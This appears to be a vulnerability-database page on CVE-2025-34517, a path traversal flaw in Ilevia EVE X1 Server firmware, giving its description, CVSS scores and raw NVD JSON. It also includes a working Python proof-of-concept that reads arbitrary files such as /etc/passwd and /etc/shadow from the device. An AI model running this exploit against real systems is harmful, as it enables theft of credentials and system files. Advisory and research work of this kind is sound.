Security Vulnerability Report
中文
CVE-2025-34517 CVSS 7.5 HIGH

CVE-2025-34517

Published: 2025-10-16 18:15:36
Last Modified: 2025-10-23 19:16:38
Source: [email protected]

Description

Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain an absolute path traversal vulnerability in get_file_content.php that allows an attacker to read arbitrary files. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ilevia EVE X1 Server固件 ≤ 4.7.18.0.eden

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-34517 - Ilevia EVE X1 Server Absolute Path Traversal PoC # Vulnerability: Absolute Path Traversal in get_file_content.php # Affected: Ilevia EVE X1 Server firmware <= 4.7.18.0.eden import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://target:8080" FILE_TO_READ = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd" # Exploit endpoint: get_file_content.php url = f"{TARGET}/get_file_content.php" # Use absolute path to read arbitrary files on the server params = { "file": FILE_TO_READ # Absolute path bypasses relative path restrictions } try: response = requests.get(url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Successfully read file: {FILE_TO_READ}") print("-" * 60) print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") # Example usage: # python exploit.py http://192.168.1.100:8080 /etc/passwd # python exploit.py http://192.168.1.100:8080 /etc/shadow

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34517", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:36.213", "lastModified": "2025-10-23T19:16:38.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ilevia EVE X1 Server firmware versions ≤ 4.7.18.0.eden contain an absolute path traversal vulnerability in get_file_content.php that allows an attacker to read arbitrary files. Ilevia has declined to service this vulnerability, and recommends that customers not expose port 8080 to the internet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ilevia:eve_x1_server_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.7.18.0", "matchCriteriaId": "25D89BA5-1632-4243-BE68-D42803774A22"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:ilevia:eve_x1_server:-:*:*:*:*:*:*:*", "matchCriteriaId": "72B4F8B5-4641-4371-8759-3AB18EC87FB6"}]}]}], "references": [{"url": "https://www.ilevia.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ilevia-eve-x1-server-absolute-path-traversal", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5960.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.